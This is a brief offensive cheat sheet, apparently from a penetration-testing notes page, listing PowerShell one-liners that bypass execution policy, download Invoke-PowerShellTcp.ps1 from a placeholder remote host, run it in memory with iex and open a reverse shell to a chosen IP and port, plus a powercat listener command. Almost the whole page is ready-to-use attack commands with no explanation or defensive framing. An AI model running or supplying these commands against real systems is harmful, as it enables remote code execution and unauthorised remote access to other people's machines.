PowerShell

Reverse Shell Bypass

 powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://<IP ADDRESS>/Invoke-PowerShellTcp.ps1'))"

Trigger reverse shell using Invoke-PowerTCP

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress <IP> -Port <PORT>

powershell.exe iex (iwr http://<REMOTE IP ADDRESS>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress <LISTENING IP ADDRESS> -Port <LISTENING PORT>

Reverse Shell listener using PowerCat

powercat -l -v -p <LISTENING PORT> -t 100

Last updated